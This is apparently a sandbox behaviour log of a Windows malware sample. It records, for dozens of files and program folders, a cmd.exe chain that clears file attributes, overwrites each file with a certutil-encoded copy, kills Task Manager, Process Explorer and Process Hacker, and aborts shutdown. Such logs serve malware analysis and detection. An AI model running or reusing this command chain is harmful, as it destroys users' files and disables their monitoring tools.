C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Common Files" "Common Files".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ConvertFromMeasure.dxf" "ConvertFromMeasure.dxf".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ConvertFromMeasure.dxf" "ConvertFromMeasure.dxf".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ConvertSuspend.jpeg" "ConvertSuspend.jpeg".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ConvertSuspend.jpeg" "ConvertSuspend.jpeg".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "DenyWait.cab" "DenyWait.cab".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "DenyWait.cab" "DenyWait.cab".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini" "desktop.ini".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExportEdit.DVR-MS" "ExportEdit.DVR-MS".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExportEdit.DVR-MS" "ExportEdit.DVR-MS".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExportWait.mid" "ExportWait.mid".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExportWait.mid" "ExportWait.mid".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "FindMerge.doc" "FindMerge.doc".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "FindMerge.doc" "FindMerge.doc".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "FormatMerge.vdx" "FormatMerge.vdx".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "FormatMerge.vdx" "FormatMerge.vdx".266435⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Google" "Google".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ImportDismount.asf" "ImportDismount.asf".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ImportDismount.asf" "ImportDismount.asf".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Internet Explorer" "Internet Explorer".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Java" "Java".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "JoinConvert.avi" "JoinConvert.avi".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "JoinConvert.avi" "JoinConvert.avi".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "MergeReset.ps1" "MergeReset.ps1".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "MergeReset.ps1" "MergeReset.ps1".266435⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Office" "Microsoft Office".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Microsoft Office 15" "Microsoft Office 15".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ModifiableWindowsApps" "ModifiableWindowsApps".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Mozilla Firefox" "Mozilla Firefox".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSBuild" "MSBuild".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PingTrace.xltx" "PingTrace.xltx".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PingTrace.xltx" "PingTrace.xltx".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProtectAssert.svgz" "ProtectAssert.svgz".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ProtectAssert.svgz" "ProtectAssert.svgz".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Reference Assemblies" "Reference Assemblies".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ResolveResize.rar" "ResolveResize.rar".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ResolveResize.rar" "ResolveResize.rar".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "RestartImport.mp3" "RestartImport.mp3".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "RestartImport.mp3" "RestartImport.mp3".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "RestoreSplit.asp" "RestoreSplit.asp".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "RestoreSplit.asp" "RestoreSplit.asp".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SearchMeasure.cab" "SearchMeasure.cab".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SearchMeasure.cab" "SearchMeasure.cab".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SelectRename.wm" "SelectRename.wm".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SelectRename.wm" "SelectRename.wm".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ShowRegister.css" "ShowRegister.css".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ShowRegister.css" "ShowRegister.css".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SplitCompress.xlsm" "SplitCompress.xlsm".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SplitCompress.xlsm" "SplitCompress.xlsm".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StartPing.rar" "StartPing.rar".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "StartPing.rar" "StartPing.rar".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StepBlock.ADTS" "StepBlock.ADTS".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "StepBlock.ADTS" "StepBlock.ADTS".266435⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Drops desktop.ini file(s)
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StopPop.ppsm" "StopPop.ppsm".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "StopPop.ppsm" "StopPop.ppsm".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "StopUpdate.tif" "StopUpdate.tif".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\certutil.execertutil -encode -f "StopUpdate.tif" "StopUpdate.tif".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "SubmitRepair.wmx" "SubmitRepair.wmx".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "SubmitRepair.wmx" "SubmitRepair.wmx".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "TestResolve.ps1xml" "TestResolve.ps1xml".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "TestResolve.ps1xml" "TestResolve.ps1xml".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall Information" "Uninstall Information".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UnprotectStop.dib" "UnprotectStop.dib".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UnprotectStop.dib" "UnprotectStop.dib".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UpdateHide.pot" "UpdateHide.pot".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UpdateHide.pot" "UpdateHide.pot".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UpdateOptimize.cr2" "UpdateOptimize.cr2".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UpdateOptimize.cr2" "UpdateOptimize.cr2".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VideoLAN" "VideoLAN".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WatchBackup.rle" "WatchBackup.rle".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
-
-
C:\Windows\system32\certutil.execertutil -encode -f "WatchBackup.rle" "WatchBackup.rle".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Defender" "Windows Defender".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Mail" "Windows Mail".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Media Player" "Windows Media Player".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Multimedia Platform" "Windows Multimedia Platform".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows NT" "Windows NT".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Photo Viewer" "Windows Photo Viewer".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Portable Devices" "Windows Portable Devices".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Security" "Windows Security".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Sidebar" "Windows Sidebar".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "WindowsApps" "WindowsApps".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "WindowsPowerShell" "WindowsPowerShell".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.chm" "7-zip.chm".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip.chm" "7-zip.chm".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.dll" "7-zip.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip.dll" "7-zip.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip32.dll" "7-zip32.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip32.dll" "7-zip32.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.dll" "7z.dll".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7z.dll" "7z.dll".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.exe" "7z.exe".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7z.exe" "7z.exe".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.sfx" "7z.sfx".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
